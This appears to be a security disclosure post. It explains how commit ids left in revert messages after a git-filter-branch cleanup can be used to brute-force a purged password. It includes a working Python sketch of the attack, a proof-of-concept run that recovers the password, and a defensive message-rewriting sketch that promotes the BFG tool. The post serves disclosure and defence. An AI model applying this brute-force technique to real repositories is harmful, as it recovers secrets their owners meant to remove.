This is a demonstration of a mildly interesting security concern relating to Git & git-filter-branch - not a vulnerability in Git itself, just in the way it can be used. I thought it was worth demonstrating that there is sometimes an avenue of attack for recovering sensitive data that's been removed from Git history using git-filter-branch. I think it's a low-severity issue, you may wish to ignore this, and indeed I've been very politely told already that it's clearly nonsense :)

Here's an unmodified repo, in which the user unwisely committed a database password:

https://github.com/bfg-repo-cleaner-demos/gma-demo-repo-original/commit/8c9cfe3c

The unwise commit is reverted with a second commit using 'git revert', which obviously leaves the password in Git history. Some time later, it's decided to properly clean the repo history with git-filter-branch & git gc, purging the password so the repo can be more widely shared (open-sourced, or just externally hosted).

git-filter-branch works exactly as intended, purging the password, but the one thing it does not typically do is update the commit message. So in the cleaned repo, the commit message for the revert commit still looks like this:

https://github.com/bfg-repo-cleaner-demos/gma-demo-repo-git-filter-branch-cleaned/commit/bf0637a5

It contains a commit id (8c9cfe3) which is no longer in the repo, but which can very easily be associated with an existing commit simply by examining the subject line of the reverted commit ("Carelessly checking password into source control"). It's also obvious, from examining the repo, where the excised data was removed (i.e. at the "db.password=" line).

At this point it's possible to do a brute-force attack: generate possible passwords, insert each one into the available commit's tree, and compare the resulting commit id against the leaked commit id. When the commit id matches, the sensitive data has been recovered.
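To make the mechanics of that search concrete, here's a minimal Python sketch. It's an illustration only, under loud assumptions: the file template, the author line, and the idea that the commit has no parent and the file sits alone in its directories are all made up for the example. A real attack would copy the tree entries, parents, author, committer and message from the cleaned commit, which the rewrite leaves untouched.

```python
import hashlib
from itertools import product

# Hypothetical stand-ins: a real attack would copy these from the cleaned repo.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
FILE_PATH = b"src/main/resources/config.properties"
TEMPLATE = b"db.password=%s\n"  # assumed file content around the gap
AUTHOR = b"A Developer <dev@example.com> 1360000000 +0000"  # assumed
MESSAGE = b"Carelessly checking password into source control\n"


def git_object_id(kind: bytes, body: bytes) -> str:
    """Git's object id: SHA-1 over '<kind> <size>', a NUL byte, then the body."""
    header = kind + b" " + str(len(body)).encode() + b"\0"
    return hashlib.sha1(header + body).hexdigest()


def tree_id(entries) -> str:
    """Id of a tree; entries are (mode, name, hex_id), already in Git's order."""
    body = b"".join(
        mode + b" " + name + b"\0" + bytes.fromhex(hex_id)
        for mode, name, hex_id in entries
    )
    return git_object_id(b"tree", body)


def commit_id_for(password: str) -> str:
    """Commit id that results if the config file contained this password."""
    node = git_object_id(b"blob", TEMPLATE % password.encode())
    mode = b"100644"
    # Wrap the blob in one tree per path component, innermost first.
    # Assumption: each directory holds nothing else.
    for name in reversed(FILE_PATH.split(b"/")):
        node = tree_id([(mode, name, node)])
        mode = b"40000"
    body = (
        b"tree " + node.encode() + b"\n"
        + b"author " + AUTHOR + b"\n"
        + b"committer " + AUTHOR + b"\n"
        + b"\n" + MESSAGE
    )
    return git_object_id(b"commit", body)


def brute_force(leaked_id: str, max_len: int, alphabet: str = ALPHABET):
    """Try every string up to max_len; return the one whose commit id matches."""
    for length in range(1, max_len + 1):
        for chars in product(alphabet, repeat=length):
            candidate = "".join(chars)
            # An abbreviated leaked id is treated as a prefix; a short prefix
            # could in principle match a wrong candidate.
            if commit_id_for(candidate).startswith(leaked_id):
                return candidate
    return None


if __name__ == "__main__":
    # Stand-in for the id left behind in the revert message.
    leaked = commit_id_for("g6")
    print(brute_force(leaked, max_len=2))
```

The search space grows as 36^n for this alphabet, so the approach is only practical for short or otherwise guessable secrets.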
A proof-of-concept implementation of this attack was indeed able to recover the purged password:

--
$ java -jar gma-0.1.jar 8c9cfe3c attack-pinpoint gma-demo-repo-git-filter-branch-cleaned
Brute-force search using these characters : 0123456789abcdefghijklmnopqrstuvwxyz
Available commit, presumed cleaned : 8ebbf661
File path : src/main/resources/config.properties
Template blob : dca1a2fb
Exhausted strings of length 1 or less
...
Exhausted strings of length 4 or less
Match with '0g6rw'
--

So all of this amounts to a fairly low-severity issue, since people should always change credentials when they mistakenly commit them to a repo. But I guess the point is that, from a paranoia point of view, when you clean a repo for sharing you want to remove all information that relates to the sensitive data, including old commit hashes buried in commit messages.

The git-filter-branch command has a --msg-filter option which could be used for this purpose, with the application of some judicious bash scripting, grep & sed-ing. However, I must confess that I believe users would be better advised to use The BFG:

http://rtyley.github.io/bfg-repo-cleaner/

The BFG already addresses this issue by replacing all old Git object-ids found in commit/tag messages with the updated id. For instance, here's that exact same commit message when cleaned with the BFG:

https://github.com/bfg-repo-cleaner-demos/gma-demo-repo-bfg-cleaned/commit/35840201

In the case that the user specifies that a filtering operation is not removing 'private' data, the BFG replaces old ids with text of the form "newid [formerly oldid]", but if the operation is in fact to strip private data, the replacement value is simply the newid - and without the old commit id, the attack described above is not possible.
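As a rough illustration of that kind of message rewriting, here's a minimal Python sketch. It is not the BFG's actual implementation: the function name rewrite_message, the regular expression, and the zero/one-padded ids in the usage example are all hypothetical, and it simply assumes a complete old-id to new-id map is already available from the rewrite.

```python
import re

# Anything that looks like a full or abbreviated Git object id.
HEX_ID = re.compile(r"\b[0-9a-f]{7,40}\b")


def rewrite_message(message: str, id_map: dict, private: bool) -> str:
    """Replace old object ids found in a commit message.

    id_map maps full old ids to full new ids (assumed to be supplied by
    whatever performed the history rewrite).
    """
    def substitute(match):
        old = match.group(0)
        # Resolve abbreviated ids by unique prefix; leave anything else alone.
        full_matches = [full for full in id_map if full.startswith(old)]
        if len(full_matches) != 1:
            return old
        new = id_map[full_matches[0]][:len(old)]
        # When private data is being stripped, the old id must not survive.
        return new if private else f"{new} [formerly {old}]"

    return HEX_ID.sub(substitute, message)


if __name__ == "__main__":
    # Placeholder ids: real ones would be the full 40-character hashes.
    old_id = "8c9cfe3c" + "0" * 32
    new_id = "8ebbf661" + "1" * 32
    msg = "This reverts commit 8c9cfe3c."
    print(rewrite_message(msg, {old_id: new_id}, private=True))
    print(rewrite_message(msg, {old_id: new_id}, private=False))
```

Hex-looking words that don't correspond to a known old id are left untouched, which keeps ordinary prose in commit messages from being mangled.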
I believe it's worth educating users to give them a more realistic understanding of their exposure, and would like to update the documentation of git-filter-branch to give them a better idea of their options for removing private data - that would include noting the BFG as an alternative.

- Roberto Tyley

https://github.com/rtyley/bfg-repo-cleaner/blob/v1.2.0/src/main/scala/com/madgag/git/bfg/cleaner/ObjectIdSubstitutor.scala#L33-L60